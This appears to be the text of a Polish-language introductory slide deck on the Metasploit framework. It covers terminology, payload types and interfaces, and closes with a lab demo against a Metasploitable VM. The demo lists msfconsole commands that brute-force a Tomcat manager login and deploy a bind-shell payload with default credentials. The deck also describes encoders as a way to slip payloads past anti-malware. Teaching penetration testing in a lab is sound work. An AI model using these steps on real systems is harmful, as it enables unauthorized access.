Metasploit Part 1
The Beginning
Agenda • Co to jest Metasploit? • Historiia • Terminologia • Rodzaje Payload’ów • Opisy modułów • Podstawy Konsoli
Metasploit... czyli? • Framework do pentestów • Napisany w Ruby • Zawiera w sobie: Exploity, Payloads, Auxiliaries,
Automation Tools, i wiele innych...
• Wieloplatformowy • Wsparcie Developerów • Możliwośd pisania własnych wtyczek • OpenSource weeeee... :]
„A little bit about this shit” Metasploit zostal przygotowany w 2003 roku w jezyku Perl. Od wersji 3.0 zostal calkowicie przepisany w jezyku Ruby. Srodowisko moze byc uruchamiane na wielu wersjach systemu Unix i Linux oraz w systemie Windows. W pazdzierniku 2009 projekt Metasploit zostal przejety przez firme Rapid 7 specjalizujaca sie w oprogramowaniu do zarzadzania podatnosciami systemów. (WiKi)
Terminologia Exploit (eksploatowad kogoś lub coś) The vector for getting into the system, whether it be because of a vulnerability or a bad config Payload (Ładunek) What you want the exploit to do.
Encoders (Programy szyfrujące) Ways to mangle the code so anti-malware apps won’t detect the payload Auxillary (pomocniczy) Just another fun little app that comes with Metasploit (IRONGEEK)
Rodzaje PayLoad’ów - Inline All the shellcode to be executed goes with the payload. More stable, but may be too big. - Staged (pl. Stopniowanie) The payload is just a small stub that grabs the rest of the shell code after the exploit works. Smaller, and less for AV to grab a hold of.
-Reverse Instead of having to establish a connection in after an exploit works, the payload connects back you. This has a better chance of getting around firewalls with weak egress filtering. - NoNX These payloads try to work around things like DEP (Data Execution Prevention) (IRONGEEK)
Ale Metasploit to nie... Czasem schemat używania to: 1. Ustawid rodzaj exploit’a 2. Ustawid rodzaj payload’a 3. Ustawid cel naszej zabawy 4. Iśd po piwo... 5. Cieszyd się kontrolą ;] To nie wszystko co potrafi Metasploit... On potrafi wiele więcej...
Piękny Prosty Interfejs MsfConsole:
Piękny Prosty Interfejs MsfCli:
Piękny Prosty Interfejs MsfGui:
Piękny Prosty Interfejs
Piękny Prosty Interfejs MsfWEB:
A teraz zalety i wady MsfConsole: + Najlepiej wspierany interfejs frameworka + Prawie wszystkie opcje są dostępne - Nie jako "wskaż i kliknij w msggui / msfweb Msfcli + Łatwo dodad dobrodziejstwa metasploita do własnego skryptu - Nie jest tak dobrze wspierany jak msfconsole - Cięższy do użycia
A teraz zalety i wady Msfweb +Fajny Interfejs +Łatwy do zrozumienia treści +Dobry do pokazania prostych ataków -Nie jest tak dobrze wspierany jak msfconsole -Wolny Msfgui + Fajny Interfejs + Własne skórki (IRONGEEK)
Podstawy Konsoli Polecenia: help search set setg show (options/advanced/etc) exploit/run sessions –l sessions -i 1
Demo Sytuacja 1:
Hacker Serwer Ubuntu
Używane rzeczy • BackTrack w wersji 5 • Metasploit 3.7.0 • Nmap
• Metasploitable
Atak cz. 1 • Skan sieci w poszukiwaniu hosta:
$~> nmap –v –sn 192.168.10.0/24 • Skan hosta nmapem
• Atak 1
Atak cz. 1 msf > use scanner/http/tomcat_mgr_login msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable msf auxiliary(tomcat_mgr_login) > set RPORT 8180 msf auxiliary(tomcat_mgr_login) > exploit
Atak cz. 1 Rezultat: mamy login i hasło Cel: zdobyd shell ;]
Atak cz. 2 msf > use multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat msf exploit(tomcat_mgr_deploy) > set RPORT 8180 msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp msf exploit(tomcat_mgr_deploy) > exploit
Atak cz. 2 Posiadamy shella, więc możemy dalej psocid.
Metasploit Part 1
The Beginning Q&A
Linki (WiKi) http://wikipedia.pl
(IRONGEEK) http://irongek.com
http://www.offensive-security.com/metasploit-unleashed/ http://www.metasploit.com/
http://backtrack-linux.org
Metasploit Part 1
The Beginning THX ;]